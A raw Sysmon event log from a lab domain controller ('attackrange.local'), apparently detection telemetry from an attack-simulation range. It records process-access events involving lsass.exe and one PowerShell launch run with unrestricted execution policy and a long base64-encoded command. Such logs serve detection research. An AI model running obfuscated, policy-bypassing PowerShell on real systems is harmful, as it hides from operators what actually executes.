10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002739Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002738Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002737Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002736Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002735Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002734Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002733Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002732Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E35-5F80-8200-000000007F01}2532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002731Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3E35-5F80-8100-000000007F01}28364100C:\Windows\system32\cmd.exe{733EE690-3E35-5F80-8200-000000007F01}2532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002730Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.201{733EE690-3E35-5F80-8200-000000007F01}2532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3E35-5F80-A1DB-040000000000}0x4dba10HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3E35-5F80-8100-000000007F01}2836C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000002729Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002728Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3E35-5F80-8000-000000007F01}50765096C:\Windows\system32\conhost.exe{733EE690-3E35-5F80-8100-000000007F01}2836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002727Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002726Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002725Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002724Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002723Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 